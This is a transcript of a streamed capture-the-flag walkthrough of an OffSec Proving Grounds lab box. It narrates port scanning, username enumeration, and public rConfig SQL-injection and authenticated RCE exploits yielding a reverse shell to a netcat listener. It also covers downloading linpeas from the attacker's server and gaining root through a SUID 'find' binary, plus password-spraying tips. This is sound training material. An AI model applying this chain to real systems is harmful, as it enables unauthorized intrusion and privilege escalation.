welcome back to another Mr. Robot Monday. Let me situate my camera here. There we go. All right. So the last time I did this, I wasn't feeling the best. Was a little sick. I was tired. I had a really long night. Actually had kind of a traumatic experience the night prior, so ended up quitting a little bit early. I was just gonna redo the same one, but I decided I'd just pick another random one instead. So let me go ahead and present what we're gonna be doing today. And I'll go ahead and share my screen, and there we go. All right, so the name of this one is Quacker Jack. It came out August 3rd of 2020. And just keep in mind, like I'm fairly new to like the proving grounds thing, so like a lot of these CTFs are new to me. They may have been up here for a while, but I simply haven't done it because I was, actually I was studying for the Pin 200, the OSCP, and then after I completed that, that's when I started looking at the practice and play machines that they had. So anyway, yeah, it was created or released in August 3rd of 2020. It's an intermediate box. It says it was rated intermediate by the community. So we'll go ahead and find out. I went ahead and booted it up. Went ahead and started my VPN and everything, so we wouldn't have to wait on that. So we have that IP address for Quacker Jack. So the first thing that I'm going to do is run a port scan, which I will actually, let me export the IP address first into our environment so that I don't have to keep typing that in. And we will run nmap tac ptac. We will run that, and we'll just see what ports are open to see what we can work with. And once that's complete, we'll enumerate a little bit further, running a script scan version scan on nmap on all of the open ports that are found. This is just one of my ways to do this. This doesn't necessarily work every single time. You might get a bunch that are filtered or closed. It might have a firewall on it, and so you might have to be a little crafty. I'll probably do a demonstration on that one of these days soon. But you have to be a little bit crafty when using nmap. But this is such a versatile tool. Like there's so much. It has so many features involved in it that regular port scanners, like I just won't use them again. Like I'll definitely always use nmap, like from the feature aspect of it. It just does so much more. So yeah, if you end up having filtered ports and there are no open ports from what it says, you could actually do some little crafty things to kind of bypass that firewall that's causing the issue. But I'll go into that at a later time. I'll probably do a whole blog, post about it. But it's a lot to explain right now. Public safety alert. Boil water advisory in effect for the area just I think it's north of me, or is it south of me, until October 17th. That's interesting. I wonder if that applies to us too. I hope not. Been drinking water all day finally. Now you're telling me I gotta boil it. All right, so we got 21, 22, 80, 111, 139, 445, 3306, and 8081. So like I said, we'll go ahead and run a script scan, version scan, to see what kind of information we can get on those services that are running on those ports. And actually, while that's running, I'll go ahead and check it out on Firefox. I'm going to check out that 80 or port 80 and then the port 8081. Let me copy this IP address. So we'll check out port 80. Testing 1, 2, 3. This page is used to test proper operation of the Apache HTTP server. Blah, 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 yada, yada. Are you the administrator? To prevent, just place it in this file because it should be in this directory. Okay. So this is just a basic welcome page. So if you established a web server, this is what's going to show up before you input anything from your website. So I might do a directory fuzzing, directory buster on this to see if there's any CMS associated with this. All right, FTP. So we have anonymous FTP login. So let me check that out. Port 22, port 80. Yeah, it's showing the same thing. It's just a server test page. Or 111.139.445. So your SMB, might check out Samba. We might check out the SMB to see if we can log into a share or something there. 3306 MySQL unauthorized. Or 8081 HTTP bad request. Quackerjack, which is the name of this, right? Yeah. Let me start with port 21 first. Let's check out this FTP. So we will FTP anonymous at the IP address. No password. Let's see, remote directory. Okay. So maybe it's not actually running. Yeah, okay. So it timed out. So it couldn't have been. Okay. I should have read that first. Whenever I ran the script tried to do the same thing that I just did and tried to get a directory listing, but it kept having a timeout issue. So it's not going to show us anything, especially if it's not going to show the script anything. So we'll just move on to the next port. All right. What did I say? So 80, we can run dirbuster. And if you are tuning in and you've never heard of any of these tools, completely okay. Feel free to drop a comment while I'm live on any of the platforms you're watching from. You can just drop a comment. I can see it from all platforms, and I'll be able to walk you through any questions you might have. So what this does, excuse me, and I've explained this in other videos. So what this does, it brute forces, or what they call fuzzing. It fuzzes directories that might be on a web page. So if you were to visit a web page like this one, for instance, and then you go to slash, say it was a blog site, you go slash blog, right? And then you go into that website. So before, if there's no links to that specific page that you're trying to get to, you would have to know that specific directory, right? And so that's what this does. It brute forces or uses a dictionary attack for common directory names. And so actually, I'm going to demonstrate it here in a second. So you input your target URL, and it even gives you an example up here. But we don't need to add port 80 since it's already on port 80. It's all HTTP. If it were HTTPS running on port 80 for some reason, then yeah, we would have to specify it. Or if it was on another port, such as the one that's running a web server, it looks like on port 8081. Yeah, see, it's running HTTP. That's not the common port for HTTP, so you would have to specify it in there. Sometimes I hit go faster, sometimes I don't. It just depends on the web server. Like if this crashes, I'll go back and undo that. But sometimes it'll make the web server crash if you go too fast. So we will select one of the common word lists. And I like to use dirbuster's word list, the lowercase small .txt. We'll use that one. File extension, I'll just use PHP because it's an Apache server. So generally the PHP extension is going to be on there. And we'll just go ahead and fuzz that. Oh, man. So like you can see, it pops up with directories that it found, common directory names, so slash icons. So if you were to go to your website and then slash icons, there should be a web page here because it was giving us a 200 response. And see, just like that, like you never would have really known that because there was nothing to click on that last page that would have led you to icons, right? So that's why we use these things, is to find like hidden little files and directories. Gotta stretch. Had my PT test for the Air Force Reserves last weekend, so my body's still a little sore from it because every time I do my sit-ups, man, I just slam my back on the ground because I'm trying to get them, knocked out as quick as possible, and I end up being sore like a couple days later. But all right, so I'm not seeing. Obviously, I'm not gonna go through all the icons. That's like a common thing, so I'm just gonna let that keep scanning. I just wanted to pull that up to kind of demonstrate it. So next, I should have just opened up another tab. What am I doing? So next, I'm going to check out that port 8081. So I will copy that, paste that, designate the port to 8081, and go and view that. Browser requests or bad requests. Speaking plain HTTP to an SSL enabled server port. So okay, so we got to use SSL, which is HTTPS rather than HTTP because that's your secure socket layers, which is what SSL stands for. So we'll go to advanced, and it's giving me this warning because I don't have or it doesn't have a certificate recognized by an official certificate authority. But since I know it's a CTF, that's why I'm clicking on advanced and then actually going to the site. But if you see this on a normal website, just trust what the browser is saying, even if it's a website you go to like all the time, because if it's stripping SSL, it could lead to a man-in-the-middle attack, and somebody could see exactly what you're doing. So if it has like a login, they could actually steal your login credentials and things of that nature. So you just want to avoid that. Sometimes the certificates just expire and things happen to where they haven't been updated. I've seen that a couple times on a few different sites, but that's far and few between. So it looks like we have a login panel for, what is this, rconfig version 394. All right, I'm going to try admin. Let's see if wait, what episode is this now? I'm just going to say, let's see if we're 4 for 4. I may be wrong about that, but admin. Log in. Don't save. Invalid password. What about... I always like to test these with like random things too, because I don't know if that was an actual username, but I'm gonna test to see if that was an actual username based on the response that it gives me. Yeah, see, so that was a username. So that's a quick validation method. It took me a little bit of time to like realize that, but however, some websites do block this and they give like a generic response saying username or password incorrect or something to that extent. But when it's based like this, that's a big no-no, right? So if you're running a website that has a login, you want to avoid error response codes like this. It needs to say username or password is incorrect. Like you want it generic and you want it to say the same thing every single time. Because based off of this error, I just found out that admin, and I'll even do it again. I just found out that admin's an actual username for one of the accounts, And see, yeah, you see how it switched to invalid password. So just a little keynote to take away, something to avoid people finding out what specific accounts or usernames are. Because now now that I have a username, and if I found other usernames just by running, some kind of dictionary attack, I could take all those usernames and do credential stuffing, to avoid a lockout. It's a or password spraying, like all of these usernames that I know for a fact are usernames. I can just do password spraying where I could just use all of those usernames and one password. And then that'll avoid a lockout generally on a lot of these sites. But all right, so that's incorrect. I thought we'd be 444. We are not. They actually changed the credentials. So or excuse me, OffSec changed the credentials for one of their CTFs here, because generally every time I go to like one of these, it's always admin, especially with OffSec, I've learned, but not in this case. Maybe that was just the easy ones. I don't know. Anyway, so I'm gonna Google this version. We'll just Google exploit. Let me see how this is doing, if it found anything. No, I'm going to go ahead and stop this because it's making my Firefox run a little bit slow. So we'll just work on this port. Since we have a login thing there, we'll just work on this port. All right, so we got, what version was it? Oh, that's right there. 394. So this is unauthenticated root remote. File upload RCE. Remote command injection. rconfig 3x chained remote. Requires Metasploit. I don't want to use Metasploit. I want to do this manually if I can. So it looks like we can do an unauthenticated thing. So maybe we don't need the password. I don't know. We'll see. Oh, sorry about that. Search field unauthenticated root remote. And this is not verified. So this may not actually work, but let's see. Python 3, run it. We include the target machine. It looks like our machine, and then our port for reverse shell. So those are the arguments. So what does it go to? Yeah, so target, your IP, your port. Okay. So the vulnerable page is at commands.inc.php. Let me copy that and test this out. Let's see if there's something there. Or let's see if we have to be logged in for that. Uh-oh, I'm hitting all kind of wrong buttons. Let me try this again. Okay, so there's some kind of page here. Remember it said search field, so we have search text, so maybe this will work. Search option. All right, yeah, I mean, let's test it out. What's the worst? It doesn't happen. I mean, so let me go ahead and copy this. And it's unverified, so let's see if we can verify this. And I will call this 48261.py because that's the name of the or the number of the exploit. And I will paste that in there, close it out, and let's try running it. So Python 3 48261.py. py. And then we need HTTPS. What is it? 192.168.246.57, and that was at port 8081, right? And then my IP is 192.168.45.202. And since I know port 80 is open on it, Let's go ahead and use port 80. So let me set up a listener. VLP, oops, tag VLP. We'll do port 80. And let's see if this bad boy works. Check your listener, nothing. The command was not executed by the target, or you forgot to open a listener. All right, so this doesn't work. I might try to see if I can go back and edit it, but let's see if we can find one that does work. This says the same thing. So this one's unverified to remote command injection. I want to find one that's verified if I can. Thought this one was the Metasploit one, right? Yeah. So I don't want to use Metasploit, but I'll keep that in my back pocket just in case. I'm just clicking on stuff. We'll find something. Oh wait, this is 395. I need 394. Maybe let's check out the credentials. There was default credentials, right? Maybe, I don't know. See, this is all 396. That's not what I need. Yeah, it's all 396. Let me check out. What is this upload RCE? Log into the application. Well, I can't. So I need some kind of credentials. Let me check out this one. Open a new tab. This is the same one we just tried. I remember that dude's name with the Viking. But see, tested with less than 397. Yeah, I don't know. Sometimes it just takes a lot of searching. You'll find some like weird ones. What does this do? It's remote or RCE. It says auth bypass. Let's see if we can auth bypass. Pretty sure we just looked at that. authenticated RCE, but we don't have authentication. Whoops. I did not mean to do that. We have to get authenticated first. Oh, you know what? Let me try search exploit. Maybe I'm doing this wrong. What is rconfig? Rconfig. Oh, 394 remote command injection. 394 search field. Arbitrary file upload. See, I'm wondering if some of the other versions might work. Because these are the two we just saw. But they're both unauthenticated though. And neither one of them work. Hmm. Is there SQL injection bypass maybe? That's authenticated. C3, whoops, 0.9.4. So this one's 3.9. It's not verified either. What is this? Search column SQL injection. So this one looks like it goes into the database. So we can test this one out maybe. Because this isn't necessarily going for a reverse shell. This is just grabbing information from the database. We might be able to grab a password if this works. Or at least a hash or something. That's interesting. But it doesn't specify 394, it just says 3.9, but we can try it unless, let me see. Version tested 3.9.4. Okay, so let's try this then. Let me get that terminal back. Oh yeah, so last week I told everybody about how to make your little headers, so I kind of kept those for this week. Simply because I just, like I said, man, last week was such a it was such a bad day for me. So I needed to get off. I needed a lot of rest, but finally rested up, ready to do this. So let's see. We will nano and we will name this 48208.py. And did I copy it already? I believe I did. We will paste that in there. And Python 3 48208.py. Trying to read how this works. Oh, so we just enter in the IP address, HTTPS. Too easy. So HTTPS 192.168.246.5, not 457, and that is port 8081. Okay, so we got nothing. That's interesting. What is this supposed to do? run it again. I don't know what exactly it is. So triggering payloads on. So it uses that search function here, apparently. Did I type in the IP address right? Oh, I typed in HTTP. Wonder if that has something to do with it. Oh shit, we got something. Eh. Hell yeah. So we got a hash there for admin. Okay. I am gonna go to, so which one was this? 48208. So that one actually works. They should verify that. He said it was tested on this version. But they have it advertised as 3.9. So I guess it works on all versions of 3.9. I'm not sure. But it definitely works there. So let us get Crack Station. I love this site. It saves me a lot of time. We'll put that hash in there and see if we can get a password for admin. That looks like a fire hydrant. So does that one. And so does that one. Man, I'm good. All right. Oh, sweet. I have a password. ABGRTYU is an MD5 hash that it pulled. So now let's see if we can log in as admin. Username, admin. I will paste that in there and log in. Hey, it worked. We are in as admin. So now we need to find a way to get RCE. Devices, clients, configuration. Wait. I did see authenticated attacks earlier. Did I not? 393. I don't know if this will work or not, but we can try it. Is there another one? That's unauthenticated. This one was unauthenticated. We tried that too. Arbitrary file upload, inclusion. Let me try this authenticated remote. Wait, which one was it? Even though it's for 3.9.3, it may work. I don't know. We'll find out. 47982. So let's search exploits. Attack M 47982. And let's try and run Python 3 47982.py. And so we need to run that again, and HTTPS, our target, which is 192.168. I keep forgetting. 0.246.57, port 8081, username admin. What was that password? Let's copy that again. My IP 192.168.45.202. And like I said, port 80 was open, so let's do that. Let me make sure I'm running a web shell though, or a listener, not a web shell. I can close that. Let me close some of these. You know, they started doing this in class, and I really need to start doing it. Actually, I don't know how to do it on this one. Let me see. Maybe this one doesn't have it. That's weird. preferences, maybe? No. All right. Never mind. I was gonna try and label all these terminals, but apparently I can't with this one for some reason. I'll have to look into that. I might just start using Terminex. I've been fighting it for so long, and everybody's all about it. Maybe I don't know. Anyway, uh, I need to make sure that I have a listener running, and it looks like I do not. So I will do that right here on port 80, and let's see if this works. Oh, sweet. So it does work, even though it's 393. So it works for 394 at least. It may not. I mean, hell, it may work for the rest of these too. I don't know. That's pretty cool. So let's see. Who am I? Apache. What directory are we in? Awesome. All right, so there's a local.txt there. Let's go ahead and get that flag. All right, we are officially in. I will save that. I don't know why this is so weird, the last action. It just went from 7 hours to 8 hours. When I started out, it said 8 hours, even though I've never even done this machine. That's weird. I don't know why it does that. All right, let's see. So from here, let me see if I can use sudo at all, maybe. Oh, no ttweb. Oh, yeah. Let me do cd/temp. And I will wget. Can I use w? Yeah. Wget http 192.168.45.202, which is my IP address. And I will get linpeas.sh. And let's set up a web server, Python 3 techm. We will do port 80. Oh, wait, we're using port 80. Well, that had port 21 already, so let's use port 21 because we know that port's open. I would just need to edit this to port 21 /linpeas.sh. Cool. So now we have linpeas. So linpeas is just a privilege escalation script for Linux. This guy made all these privilege escalation scripts that are freaking amazing. So one for Linux is called linpeas, one for Windows called winpeas, one for Active Directory it's called adpeas, and they all work really, really well. Usually with the more difficult capture the flags, like you're not going to see much on these, but they still enumerate quite a bit of information. If you're able to parse through all of that, it's phenomenal. So let's see. We will make it executable with chmod +x linpeas.sh, and we will run that. And if this is your first time seeing this, anything like that in the yellow and red is generally your attack vector for privilege escalation. Doesn't always guarantee it though. And the one that I just saw there was oh, there's one right there. The first one that I saw was a kernel exploit, which I like to avoid those generally because of the stability issues. Sometimes you'll run them on these CTFs and it just crashes everything and you have to basically start over again. It's pretty frustrating. So I like to avoid those at all costs. So if I don't find anything else, and generally I'll look through like a lot of stuff to avoid these. But sometimes that's just the way. Like this one says it's vulnerable to this CVE, which is I'm pretty sure that's PwnKit. Oh, Dirty Cow, that's what it is. So yeah, the Dirty Cow exploit, Dirty Cow 2, it says it's highly probable that this will work, but yeah. I just found something else I'm going to try, which I'm pretty sure will work, and that is using a binary called find. So this is suid, so it has the S mark in there. So this is a suid binary, meaning that whenever this is run, it's run as this user, which is root. And so we can find a way to run this command and then keep the privileges from root, basically, is what we're going to try to do. Uh, there's a website for it, which I've spoke about previously, called GTFO bins, where they already have scripts to pretty much do this. So you don't even have to second guess it. You just go here. I type in, it was called find. I click on suid. And so they have different commands for different things, right? So if you have sudo privileges for it, you can run this to get it. The binary has a suid bit set, so we are able to basically run this. And then we should have a root shell. So let me copy that. So it's under user bin. So user binaries. User bin, and then I can just paste in the rest here. And once I run this, I should get root. Should. So who am I? Root. Sweet. We just rooted this thing. Let me oh wait, what am I doing? I need to grab my notes here. If you're not familiar with it, I use Notion. Phenomenal tool for doing your notes or taking your notes. So I have all of my notes in here, GPen. So generally what I do is like I combine all of my stuff into one thing, which is this offense. So all of my different courses and stuff, once I learn something new, I put it in like its appropriate section. If it doesn't have a section yet, I make one. That way, like I know, hey, if I've done this before, like I know exactly where to look for it, right? Because I'm like, okay, well, I've done this before. This is how I did it, like evasion, like AMC bypass. I did a whole blog thing on that. So like, PowerShell version 2 doesn't have AMC, right? So if I can downgrade, I can do that, or I can split them up, or it's just a very handy tool to have. And I've found this way, especially for like CTFs and stuff, organizing everything this way is amazing. Like, so every capture the flag I've done, uh, every class that I've had, if there's some kind of something that I have done in a certain way, like it's all recorded here for, easy access. That way I'm not having to go through my notes for like OSCP, for instance. I'm not having to run through all those, or GPen. I'm not having to run through all those. Speaking of GPen, I actually took that exam. Was it last weekend or something? I think I spoke about it briefly, but yeah, I ended up passing. Now I'm enrolled and working on my GCPN, which is the Cloud Penetration Testing Cert from SANS. As you see right here, there's my notes for it. So yeah. Anyway, I need this command right here so that I can get a better looking shell. Oh, you're dirty. Okay, no, never mind. That's fine. I mean, at least you can see right there it has the root symbol, but Let me see. Which Python? User bin Python. Let me see if I can run a Python command. Nope. Damn. Wonder why it's doing that. Oh, I know. I'm such an idiot. Whatever. We don't need to do that. That's fine. I will just go back as root and we will grab that flag then. So we'll go to the root directory. Make sure it's actually in there before I do that. Okay, yeah. So cat roof.txt. And we have capture the flag. Copy that and we will paste it in there. Drum roll, please, and congratulations. It is correct. So we just rooted Quacker Jack. I don't know why it's called that. Like I didn't see anything. It was no duck hunting here, but open your eyes. What? There was nothing. I would assume that there would be like a web page about hunting or something. You know, based off of this, like I don't know, website selling hunting gear or something, duck related, Quacker Jack. Like I don't understand that. Am I missing something there? Was there something like that? So there was this R config. I didn't find anything on port 80. Oh wait, let me log in again. What? Yeah, just remember me then. There we go. So the server name is Quackerjack, but why? Like there wasn't anything else here. I'm very confused with that. Huh. Yeah, that's weird. Anyway, so yeah, we just rooted that. That one wasn't too difficult. I can see why they made it as intermediate. So just a little recap. We actually used this script right here. Even though it said 3.9, it used a SQL injection to attack the MySQL database that was running. And so it extracted our hash for the admin login. Then we logged in as admin, as you can see here. And then once we had that password, there was another. I just closed it out too. There was another exploit that we used. There's just like so many exploits that wouldn't work on it because it talks about unauthenticated on the exploits that I found. I'm not sure. I'm not sure how they got that to work because that definitely didn't work for me. I might go back and review the code, but that didn't work for me. So I assumed this wouldn't work for me because it was using the same thing. I don't know. That was weird, but yeah, we ended up finding one that. Oh yeah, it was on search exploit. That's what it was. Almost forgot about that. So yeah, we ended up finding this script right here that gave us a shell. And then from there, we found a sudo binary, ended up running that and got root. Pretty simple stuff. So long as you know what you're doing. Cool. Well, hope you guys enjoyed. If you have any questions on any of this stuff, just let me know. Feel free to leave comments, suggestions, anything like that. Make fun of me. Like I said, I don't care. It's completely fine. This is all for my growth benefit, I guess, and trying to keep up with those skills I've developed over time, and hopefully helping some people out. So if you want to learn this stuff, have questions, feel free to ask me. Send me an email, sam@cybattack.com. Drop a comment in here, completely fine. And tune in next Monday, and I'll do another one of these. So thanks for tuning in. I'll see you guys.